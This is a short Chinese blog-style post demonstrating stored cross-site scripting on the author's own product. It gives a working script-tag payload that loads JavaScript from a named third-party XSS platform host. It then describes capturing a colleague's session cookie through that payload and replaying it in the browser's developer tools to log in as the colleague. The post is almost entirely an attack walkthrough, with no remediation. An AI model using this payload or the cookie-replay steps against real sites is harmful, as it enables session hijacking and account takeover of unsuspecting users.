今天在测试自己产品的时候，发现有个地方输入框执行javascript脚本。

正好趁着这个机会给小伙伴们演示xss的危害。

首先在XSS平台上搭建一个测试项目。

我用的是http://xss.fbisb.com这个的免费平台

项目配置选择默认就可以了。

然后直接复制平台提供的代码到存在xss漏洞的地方

<sCRiPt sRC=http://xss.fbisb.com/10bt></sCrIpT>

保存以后，我让另一个同事登录，并点击这个模块。

这是XSS平台就捕获到cookie信息。

获取到地址和cookie  我就可以直接用浏览器登录了

chrome浏览器，F12修改cookie为获取到的cookie并修改url，回车，登录成功！

就可以直接用同事的账号在我的电脑登录了。